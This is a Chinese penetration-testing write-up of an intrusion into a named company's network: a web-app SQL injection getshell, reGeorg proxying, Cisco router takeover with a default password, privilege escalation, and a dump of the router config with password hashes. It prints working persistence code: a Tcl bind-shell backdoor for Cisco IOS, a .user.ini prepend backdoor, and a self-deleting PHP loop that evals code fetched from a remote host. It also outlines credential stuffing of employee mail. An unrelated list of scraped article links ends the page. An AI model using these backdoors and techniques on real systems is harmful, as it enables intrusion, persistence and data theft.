常规的,从web业务撕开口子

url:bit.tcl.com

getshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system

看看网卡信息

只有一块网卡,处于10.4.22的私网地址

在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法

0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透

0x01如果想要对整个C段主机进行渗透,比较完整方便的方法还是扫描,这里就需要我们进行内网代理,然后扫描

正向代理or反向代理,因为此处主机无法通外网,所以我们选择正向代理

一个我常用的代理reGeorg

https://github.com/sensepost/reGeorg

上传代理脚本,然后用regerog尽心代理链接(regeorg需要urllib3,所以各位需要用到时,先安装这个模块)

用nmap等进行代理扫描,很简单可以使用proxychains或者win 下使用proxycap

因为我们这里指定的端口时2333,所以修改一下proxychains的conf

以此来尽心内网C段的信息探测

0x02当然,仅仅通过扫描,并不能获取到最全面的信息,最全面的信息,要么就是我们拿到了内网拓扑,或者,我直接日下了路由器

路由器,走你~

通过之前的nmap扫描,我们大概知道了开放web服务的主机

访问11,12,13三台主机后,发现时cisco的路由器,且是开放web管理的cisco路由器,默认密码cisco成功进入

开放web管理的思科路由是可以在web端执行命令的,但是我们的路由权限只是1,cisco的权限分级大概是这样:

管理员是7 ,但是有15个权限分级,15的权限基本属于为所欲为权限

在这里,因为看到当前路由ios版本号是

低版本的iOS可以利用我之前的一个老洞进行cisco路由提权

因为在web端,可以用privilege15进行命令操作

这样我们就拥有了一个privilege15的用户,赶紧telnet进路由看看配置,一定会有惊喜

看到我们确实拿到了privilege15的用户

那么,来瞅瞅路由配置吧

code 区域

DZSW-3560-A#en

en

DZSW-3560-A#show running-config

show running-config

Building configuration...

Current configuration : 3678 bytes

!

version 12.2

no service pad

service timestamps debug uptime

service timestamps log uptime

service password-encryption

!

hostname DZSW-3560-A

!

enable password 7 121A0C041104

!

username admin privilege 15 password 7 1543595F507F7D

no aaa new-model

system mtu routing 1500

vtp mode transparent

ip subnet-zero

ip routing

!

!

!

!

--More--

!

!

no file verify auto

spanning-tree mode pvst

spanning-tree extend system-id

!

vlan internal allocation policy ascending

!

vlan 218

name Call_Center

!

vlan 220

!

vlan 222

name WEB

!

vlan 223

name DB

!

!

interface Port-channel1

switchport trunk encapsulation dot1q

switchport mode trunk

!

interface Port-channel2

description Connect_To_YDBFZX-C3750_Po1

no switchport

ip address 10.68.3.2 255.255.255.252

!

interface GigabitEthernet0/1

switchport access vlan 218

switchport mode access

!

interface GigabitEthernet0/2

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/3

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/4

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/5

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/6

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/7

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/8

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/9

switchport access vlan 222

switchport mode access

!

interface GigabitEthernet0/10

switchport access vlan 222

switchport mode access

!

几个业务,DB,办公的vlan跃然于眼前,当前我们实在web vlan的

其他两台路由也一样到玩法

===================分割线==================

那么有的同学就问了,如果我不满足于在web vlan闹腾,如果我作为一个黑阔,我要去办公vlan去耍怎么办,哟西~既然我们都已经控制了路由啦,当然可以去闹!

因为我不是运维狗,所以咨询了z8大屌,他告诉我,少年,你听过GRE隧道么,诶嘿~

code 区域

GRE 是一种最传统的隧道协议,其根本功能就是要实现隧道功能,通过隧道连接的两个远程网络就如同直连,GRE在两个远程网络之间模拟出直连链路,从而使网络间 达到直连的效果

http://itchenyi.blog.51cto.com/4745638/1137143

http://www.codesky.net/article/201207/171461.html

大家可以参考这两个地方

通过GRE隧道配置,我们就可以跑到另外一个vlan去闹了~

(做人留一线,日后好相见,就不截图call_center的vlan了,渗透其网段的思路也和之前介绍的一样)

=========分割线==============

那么又有同学举手了,如果我渗透的目标无法短时间内就完成,需要进行后渗透,我怎么样才能让我之后的渗透也方便呢?

好的,同学你很猥琐,这里介绍几个平时我们工作中常用的留后门多法子

首先,这个cisco的路由后门,我们肯定要优先留一个

cisco路由器支持TCL cisco脚本,所以我们的后门也通过这个来完成

code 区域

# TclShell.tcl v0.1 by Andy Davis, IRM 2007

#

# IRM accepts no responsibility for the misuse of this code

# It is provided for demonstration purposes only

proc callback {sock addr port} {

fconfigure $sock -translation lf -buffering line

puts $sock " "

puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"

puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"

puts $sock "---|---|---|---|---|---|---|---|---|---|---|---|-"

puts $sock " "

set response [exec "sh ver | inc IOS"]

puts $sock $response

set response [exec "sh priv"]

puts $sock $response

puts $sock " "

puts $sock "Enter IOS command:"

fileevent $sock readable [list echo $sock]

}

proc echo {sock} {

global var

if {[eof $sock] || [catch {gets $sock line}]} {

} else {

set response [exec "$line"]

puts $sock $response

}

}

set port 1234

set sh [socket -server callback $port]

vwait var

close $sh

这是老外写的一个后门,先在路由中开启tclsh模式,然后引入后门脚本

Router#tclsh

Router(tcl)#source tftp://x.x.x.x/backdoor.tcl

这样我们就留下来后门,下次链接可以直接在网段内的机器直接

nc 路由ip 1234(端口在后门脚本中修改)

ok,如果web的入口断了,这一切都白搭,所以我们还应该对web的机器留下比较隐藏的后门

说两个,一个是文件形的后门

这个办法之前phinthon老师已经说过了,就是通过php.ini或者user.ini留后门

在一个有正常php文件的目录下新建一个.user.ini

内容为

auto_prepend_file=xxx.gif(png/jpg)之类

而你的xxx.gif之类就是你的后门

具体可以参考http://drops.wooyun.org/tips/3424

第二个办法,非文件形的后门,这样的后门优势在于非常隐蔽,一般的网管都发现不了,但是有一个非常大的缺点,重启,或者进程中断后门就消失了

原理大概是:后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接

code 区域

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码,这是之前某人写过的了

ztz最近有写了一个更赞的无文件后门,你们快去找他要

除了这样的,如果主机是linux,也可以用前段时间猪猪侠说的crontab做后门

漏洞证明:

我们来大概总结一下这次渗透,首先通过外部业务撕开入口,通过代理的方式对内网进行探测,发现了cisco路由,于是利用之前的漏洞进行提权,搞定了路由器,整个vlan划分展露无遗,开启god mode

因为我们这里是概念性的测试,所以尺度不能太大,但是,如果我是一个黑客,我接下来会做的事儿:

利用tunna转发3389出外网链接(但是在这个场景中,出外网限制了部分端口,但是可以查询dns,我们应该利用端口复用的方式),远程桌面后扩大战果(嗅探其他机器)

读数据库我们看到了很多tcl的员工用户数据,可以直接对tcl的企业邮箱直接撞裤攻击

因为路由器搞定了,跨vlan到另外的段,继续进行渗透

概念性证明图:

wooyun内网渗透教学分享之内网信息探测和后渗透准备相关推荐

  1. 虚拟服务器怎么建商城,如何建立一个独立商城网店初学分享ShopEx网店系统建站心得...

    读大学的时期我们学的是国际贸易方面的课程,有好多同学都在大学时期开始对网上电子商务产生了兴趣,我都是其中的一个,因为读的是国际贸易所以有好多理论性的还没有得到具体的实践,所以为了把理论知识得到进一步的 ...

  2. 渗透测试常用工具-使用meterpreter模块进行后渗透测试

    使用meterpreter模块进行后渗透测试 第一步,打开网络拓扑,点击启动选项,启动实验虚拟机 第二步,使用ifconfig和ipconfig命令分别获取渗透机和靶机的IP地址,使用ping命令进行 ...

  3. 内网渗透(十二)之内网信息收集-内网端口扫描和发现

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  4. 内网渗透(十五)之内网信息收集-域环境中定位域管理员

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  5. PHP仿百度网盘文件分享dzzoffice网盘系统源码

    简介: 1.断点续传功能. 市面上许多所谓的断点传传基本没有完美的,本源码经过修复,完美实现了断点.续传功能. 切片:大文件分成1MB大小的小文件,服务器上传无压力,切片文件合并无压力. 市面上许多切 ...

  6. ThinkPHP php 仿千图网源码_仿百度网盘文件分享dzzoffice网盘系统源码_PHP

    声明:"本专区源码来源于各大收费资源站转载 ,都是花钱买的,但是站内不测试 ,仅供学习参考,请勿用作商业用途,签到投稿即可获得积分下载!" 本网盘修复的焦点功效 1.断点续传功效. ...

  7. 内网渗透(十三)之内网信息收集-收集域环境中的基本信息

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  8. 内网安全攻防:渗透测试实战指南之内网信息搜集

    <内网安全攻防:渗透测试实战指南>第2章:内网信息搜集 内网渗透测试的核心是信息搜集.本章主要介绍了当前主机信息搜集.域内存活主机探测.域内端口扫描.域内用户和管理员权限的获取.如何获取域 ...

  9. 内网渗透-Metasploit之——基本后渗透命令

    Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...

最新文章

  1. 重建控制文件具体解释
  2. 入职一周了,发现自己来了假阿里?
  3. 润乾集算报表提升性能之可控缓存
  4. eclipse egit提交方法
  5. phpcms下的邮箱设置
  6. python文件名匹配
  7. SQL基础语句(详解版)
  8. Binary XML file line #2: You must supply a layout_height attribute inflate
  9. html盒子模型 1209
  10. 神奇的applycall
  11. sqlite 事务处理 java_SQLite事务处理
  12. JAVA编写的一个简单的计算器
  13. 写在前面(ShenYu)
  14. wifi微信认证服务器架设,商业WiFi微信认证实现
  15. python_生成器简介
  16. excel未保存强制关闭计算机,Excel文件未保存就关闭了,怎么恢复数据?
  17. 一起来了解一下FIFO!
  18. 计算机不能上网怎么检查,电脑不能上网如何通过Ping命令检查网络
  19. 【网络】路由器和无线路由器就这么配置
  20. HTML 表格跨行与跨列

热门文章

  1. 一文搞懂route在windows和linux上的使用方法
  2. 带宽大小及各频段对系统的影响
  3. 【好书推荐】——书中自有颜如玉,书中自有黄金屋
  4. Kotlin 中的初始化lazy和变量lateinit
  5. mapperscan扫描不到包问题
  6. 音视频系列八 ffmpeg使用mediacodec硬解码
  7. 优麒麟 20.04.1 详细更新列表
  8. RGB 9, 73, 247 的 HVS 值是多少
  9. 三角形网格 四方形网格_HTML5中3D对象的三角形网格
  10. 基于 word2vec 商城推荐系统的设计与实现